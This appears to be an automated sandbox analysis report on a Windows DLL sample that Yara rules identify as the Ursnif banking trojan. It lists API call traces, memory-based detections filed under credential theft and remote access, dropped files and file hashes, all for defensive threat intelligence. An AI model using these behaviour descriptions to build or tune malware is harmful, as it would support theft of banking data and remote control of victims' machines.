Code function: 1_2_046CDB44 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

1_2_046CDB44

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_01C130FD GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

1_2_01C130FD

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_01C13807 GetVersion,GetLastError,

1_2_01C13807

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_01C15F8B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_01C15F8B

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

Windows Analysis Report
61f113091fd0c.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted URLs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

ID:	560270
Product:	CloudBasic
Start time:	10:26:42
Start date:	26.01.2022
Sample:	61f113091fd0c.dll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	687f33ac9cb2e8b3c1e7659422caf253
SHA1:	472513fe01ecbc2f51d70d762c1992a4a24c6c15
SHA256:	d1ca0d9f10382d484d02e90d4d5d987653de42a8c4eb5544e4368e4f1965803c
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	1F1446CE05A385817C3EF20CBD8B6E6A	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
C:\Users\user\AppData\Local\Temp\0hsihch1.0.cs	UTF-8 Unicode (with BOM) text	35EAB9A45B1CC09A0099A179AD3DCFE5	42939AC7047BC372300FDD21624100E5C9F83B7F	EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	7EE5D883B6955CCFAE7CAD3FE22CB99B	67C0F50C1230CFC726F1CEA4B70A4834B0B4FCE1	F52B96F19A2EA70864B64E8E0A2DDD5D8F9136E3764FA942235E70E721878AD4
C:\Users\user\AppData\Local\Temp\0hsihch1.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	16C2ADA8A386BC091BA2102AA2EAAA8A	CCED25C37AD736241E59EE63B4AD83CEFA795E69	C2BFD0A629378ED8B80CFFE1EA3CD691F2A15C3FFE3D9495604AC732DCB94BF3
C:\Users\user\AppData\Local\Temp\0hsihch1.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	307A9BF290A954A780806D0654D542DB	5AFBAC2DAEF8EDD20D557E79BB490DC10026604C	5ABE22E6476D658788B11406CF28AAF1AE8C35A61504694A202B6D836A535EB4
C:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP	MSVC .res	4D219614CBA84381F96B83F1027944AC	B1555827904FF1867D12D78853FE3860A13732FE	A5A109C402C8B0CE26398AD22860F9386E31DAB339D6C44ECD466D5484928202
C:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP	MSVC .res	CB71703D29E5D95F33A5CE8E646DAC20	8F2293399F6CF908E6E651F1ADD9BAC2F861BBB6	4DA97D39F383049194CB544D7720D0742787A66533287D22F8BD837560F06776
C:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP	MSVC .res	7A7A695ED9B4839CF4A95F6D7EA3380D	D95223A5C357BF8611ECD7F6A4EDD7B1FF4767A3	6BEED4CF9406576376FFD6746AF150A7783C42B72F97D07E43FDE855B7F4682D
C:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP	MSVC .res	BA6B36A22F29C8CC1CA62C3541556253	051A01AD9D1E2A9BCB749331D7BF5510E7B6DD69	DB6F27C18ECAF0579F508CCDB669E2EBF9273EFC744B7F288C7838C46307C761
C:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP	MSVC .res	0BE267FE339A54A24DAA9E65E6F95CB5	F0A26EBA80A57C9AE877DDA515CD8839AB248DBC	E289D53A2DDEB704A64E7D836DECE0BE9D15DE35E995DF87B82C8B422E74D867
C:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP	MSVC .res	5D1F8A6103781ABBC01C0A7CDBDB55F1	84D704124B90721B76E1CA4442A54BA949084DDA	53D6E3E968DB598701D042DB4EA37861E7EC7E0C32F917418FD5722AEC09CDF7
C:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP	MSVC .res	2E143A93A2C9C276940D7D7645DC9F15	0C0C63550213FFFE37A2B30E44DF6E71B0776D92	5F4FBDDD36C8511BADBD3355A57D1855779B37C310DAA69CE83F897C72D6BAFA
C:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP	MSVC .res	B40A0EC8107302ECF30F3151B8248712	20BA5ECE74A719F1E7E8835CB603E02B2ABBAE2A	900DA9E1423AC9AAF5311E7415F5F2E76882D12902B96606B3D80910D1E4A416
C:\Users\user\AppData\Local\Temp\RES105D.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols	9042878F130635563C43742E2E83367F	680B4C0C9B34FEBB34312D5B1002FD0C84D0BB48	5142B2B66B4FE66C0B8AA98FEE8E10FCD12B4F06D727A388BCC199CEC0BB2576
C:\Users\user\AppData\Local\Temp\RES2E65.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols	BCA81E8793B496D3AD1690253CC3F263	3F66CAE801FB007C9D64D3C7FF6E9C4B1ECFF6F7	A8C74C4C9F87B03A1E65BF219EDCB76F3D63A45733673BB4E402A1635A4F6BA5
C:\Users\user\AppData\Local\Temp\RES3848.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols	4D52D282A050FBD77DCF3B62ADAEB815	E9464278394931D88B682821B00B7405A4D564AC	2E65D5A8DE9DA248BE6DFB8F2B6C9C9F56D36F2A978D2DD41ACEE2DA516EE930
C:\Users\user\AppData\Local\Temp\RES4A3A.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols	4340D378D85430E4B567D8325AD7B630	8D4AF2B92289F05060A29A58A25FFF62497012F3	5F1CAC6C4FDC193B24E2114A1E044B1F54763C8229AB5602533C6FF35AE64529
C:\Users\user\AppData\Local\Temp\RESEA8.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols	E94034754ED647F643858219D8BED106	8985855D9E535B81B954539017A71A324E40D93A	7F2554CA86A1707C7AA12864CAA3A1F9FA2952E6AFD1E0D200DED06F2E3C0BDB
C:\Users\user\AppData\Local\Temp\RESEEEB.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols	08D2973E298791EDFC7E740782873E6A	23E6211CDBE8247EF38995D640CD31CD5DD094A1	C6A673B3472B7AEBC8B20F68E87F09D7ABA4844971D6FD19C39D09B15D605813
C:\Users\user\AppData\Local\Temp\RESF563.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x47e, 9 symbols	74149A607262FF6591455E30A294647F	30E7ADE77B6A73462A9690E595416CAFB46A7669	BC161911416B32D3461A2D6904832963F8145979C5BA98FFE74CCFCE821894B8
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02dez10h.oni.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fuoontv.beq.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npkgel2o.x34.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sb4tfs3y.gr4.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
